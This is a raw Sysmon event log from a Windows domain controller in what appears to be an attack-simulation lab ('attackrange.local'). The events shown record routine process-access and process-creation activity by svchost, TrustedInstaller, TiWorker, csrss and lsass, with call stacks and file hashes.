12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.987{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.971{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.799{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.799{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 
10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.768{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.705{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.690{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.698{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Wind